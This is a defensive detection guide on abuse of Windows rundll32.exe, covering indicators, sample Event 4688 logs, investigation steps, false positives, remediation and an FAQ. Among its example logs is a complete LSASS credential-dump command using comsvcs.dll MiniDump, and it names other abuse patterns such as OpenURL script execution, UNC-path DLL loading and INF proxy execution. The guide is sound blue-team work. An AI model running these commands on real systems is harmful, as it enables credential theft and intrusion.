Rundll32 Abuse — LOLBin Code Execution, LSASS Dump & DLL Proxy Detection

MITRE ATT&CK

Security Relevance

Rundll32 is among the most abused LOLBins because it is present on every Windows system, trusted by application whitelisting, signed by Microsoft, and capable of executing arbitrary code simply by loading a DLL. The comsvcs.dll MiniDump technique is particularly dangerous: it dumps LSASS credentials using two fully signed Microsoft binaries (rundll32.exe and comsvcs.dll), making it invisible to signature-based AV and bypassing RunAsPPL in environments that haven't explicitly blocked it. Attackers also use rundll32 as the final stage of a macro or script delivery chain — a phishing document runs a VBScript that calls `rundll32.exe` with a payload DLL, keeping the entire kill chain within signed or script-interpreted files.

Indicators of Malicious Use

• ⚑DLL path outside System32/SysWOW64/WinSxS in the 4688 command line — legitimate rundll32 usage loads system DLLs from known paths; any path in Temp, AppData, Downloads, Desktop, or a network share is extremely suspicious.
• ⚑`comsvcs.dll MiniDump` in the command line — LSASS credential dump using signed Windows components. No external tools required. Correlate with Event 4663 (lsass.exe object access) to confirm the dump occurred.
• ⚑`javascript:` or `vbscript:` appearing after a DLL argument — rundll32.exe url.dll,OpenURL executes inline script, bypassing script engine execution policies and avoiding wscript/cscript in the process list.
• ⚑UNC path DLL argument (`\\server\share\evil.dll`) — loads the DLL from an attacker-controlled SMB share; triggers an outbound SMB connection visible in firewall logs or Sysmon Event 3.
• ⚑`advpack.dll,LaunchINFSection` or `ieadvpack.dll,LaunchINFSection` — proxy execution via INF scripts; can execute arbitrary commands without spawning cmd.exe directly.
• ⚑rundll32.exe spawning child processes (cmd.exe, powershell.exe, wscript.exe, mshta.exe) — rare in legitimate use; nearly always indicates the loaded DLL executed a shell command or injected shellcode that spawned a new process.
• ⚑Ordinal-only export invocation (`rundll32.exe evil.dll #1`) — hides the function name from command-line log scanners that look for known export names; the absence of a readable function name is itself a signal.
• ⚑rundll32.exe making outbound network connections (Sysmon 3 or 5156) at unusual times or to external IPs — most legitimate rundll32 calls are local; network-active rundll32 indicates a beacon or download stage.

Example Log Entry

# Event 4688 — LSASS Dump via comsvcs.dll MiniDump (no external tools)
Log Name: Security
Event ID:  4688

New Process Information:
  New Process Name:   C:\Windows\System32\rundll32.exe
  Process Command Line: rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump 716 C:\Windows\Temp\lsass.dmp full
  Creator Process Name: C:\Windows\System32\cmd.exe

# Event 4688 — Rundll32 loading DLL from AppData (non-system path)
Log Name: Security
Event ID:  4688

New Process Information:
  New Process Name:   C:\Windows\System32\rundll32.exe
  Process Command Line: "rundll32.exe" C:\Users\jsmith\AppData\Roaming\stage2.dll,MainFunc
  Creator Process Name: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE

# Event 4688 — Rundll32 spawning PowerShell (child process from loaded DLL)
Log Name: Security
Event ID:  4688

New Process Information:
  New Process Name:   C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Process Command Line: powershell.exe -enc JABjAGwAaQBlAG4AdA...
  Creator Process Name: C:\Windows\System32\rundll32.exe

Investigation Steps

1. 1.Parse the DLL path from the 4688 command line — is it in System32/SysWOW64/WinSxS? Any other path is high-priority. If comsvcs.dll MiniDump is present, pivot to the lsass-access detection guide and look for Event 4663 on lsass.exe around the same time.
2. 2.Check the parent process of rundll32 in Event 4688 — rundll32 spawned by Word/Excel/Outlook indicates macro delivery; from wscript.exe/mshta.exe indicates script-based delivery; from cmd.exe or PowerShell indicates manual or automated attacker execution.
3. 3.Search for child processes of rundll32.exe within 60 seconds of the Event 4688 — query 4688 for `ParentProcessName` matching rundll32. Any shell spawn (cmd, powershell, wscript) confirms the loaded DLL executed arbitrary code.
4. 4.Check outbound network connections from rundll32.exe — search Sysmon Event 3 or Windows Firewall Event 5156 for rundll32 as the source process. UNC path connections (port 445 SMB) indicate remote DLL loading; HTTP/HTTPS connections indicate C2 or payload download.
5. 5.Hash the suspicious DLL if it exists on disk — submit to VirusTotal or check against your EDR's known-good hash list. Legitimate Microsoft DLLs have consistent known hashes; attacker DLLs will be unknown or flagged.
6. 6.If the command line uses a numeric ordinal (`#1`, `#2`) instead of a named export, this indicates deliberate obfuscation — use dumpbin /exports or a PE viewer to resolve the ordinal to a function name for further analysis.

Common False Positives

• ◎Windows Installer and driver setup — `rundll32.exe setupapi.dll,InstallHinfSection` is normal during driver and component installation. These are short-lived, occur during known installation windows, and the DLL is in System32.
• ◎Printer driver management — `rundll32.exe printui.dll,PrintUIEntry` is used legitimately by Windows print management tools. Correlate with printer-related activity in the environment.
• ◎Control Panel applets — `rundll32.exe shell32.dll,Control_RunDLL` launches .cpl files for Control Panel operations. The parent process will typically be explorer.exe or a management tool.
• ◎Some older enterprise applications register COM objects or shell extensions by calling `rundll32.exe <component.dll>,DllRegisterServer` — verify the DLL path is a known vendor location and correlate with software deployment schedules.

Remediation

• ✓Alert on rundll32.exe spawning cmd.exe, powershell.exe, wscript.exe, or mshta.exe child processes — this parent-child relationship has no legitimate use case and is a reliable high-confidence detection.
• ✓Alert on rundll32.exe loading DLLs from user-writable paths (any path outside System32, SysWOW64, WinSxS, and known application directories) — this catches the majority of malicious DLL load patterns.
• ✓Deploy WDAC or AppLocker rules that restrict rundll32.exe to loading only DLLs signed by Microsoft from trusted paths — this eliminates arbitrary DLL execution while preserving legitimate system use.
• ✓Block outbound SMB (port 445) from workstations to external IPs — prevents UNC path remote DLL loading attacks that fetch the malicious DLL from an attacker-controlled server.
• ✓Enable Attack Surface Reduction rule 'Block Win32 API calls from Office macros' (GUID: 92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B) — this breaks the most common delivery chain (phishing document → rundll32 payload).
• ✓Audit for comsvcs.dll MiniDump specifically — create a dedicated SIEM rule for any 4688 command line containing both 'comsvcs' and 'MiniDump'. This combination has essentially no legitimate use in production environments.

Related Event IDs

Related Detection Guides

Frequently Asked Questions

How is rundll32 abuse different from DLL hijacking?

Rundll32 abuse explicitly invokes a malicious DLL via the rundll32.exe command line — the attacker controls the path and export name, and the activity is visible in Event 4688. DLL hijacking plants a malicious DLL in a search-order path used by a legitimate process, which loads it automatically without rundll32 being involved at all. Both result in DLL execution, but rundll32 abuse is easier to detect (it's in the command line) while DLL hijacking hides within normal application loading behavior and requires DLL load monitoring (Sysmon Event 7) to catch.

Why does comsvcs.dll MiniDump bypass antivirus?

Because both rundll32.exe and comsvcs.dll are signed Microsoft binaries, and MiniDump is a legitimate Windows API function used by crash reporting tools. Signature-based AV cannot block a Microsoft-signed binary calling a legitimate Windows API. Detection requires behavioral analysis — specifically, identifying that the MiniDump target is lsass.exe, not a crash reporter. LSASS process access (Event 4663) combined with the comsvcs.dll command line in 4688 is the detection chain. RunAsPPL does not protect against this technique by default; only Credential Guard (which moves LSASS secrets into a hypervisor-protected enclave) is effective.

Can I block rundll32.exe entirely?

Not without breaking Windows — rundll32 is used by Control Panel, printer management, driver installation, and many system functions. The practical approach is behavioral restriction via WDAC or AppLocker: allow rundll32 to load only DLLs from System32/SysWOW64, block child process spawning, and alert on non-system DLL paths. WDAC-enforced signing requirements mean attacker DLLs (unsigned or with untrusted signatures) fail to load before they execute. This preserves legitimate use while eliminating the vast majority of attack techniques.

Does Sysmon significantly improve rundll32 detection?

Yes — substantially. Windows native Event 4688 captures the command line, but Sysmon adds three critical dimensions: Event 1 (process creation) includes the full command line plus file hashes and parent command line; Event 3 (network connection) captures outbound connections from rundll32.exe that reveal C2 or remote DLL loading; Event 7 (DLL load) tracks every DLL loaded into rundll32, making ordinal-only invocations visible by resolving which DLL was actually loaded. Without Sysmon, network and DLL load activity from rundll32 requires firewall/EDR telemetry to detect.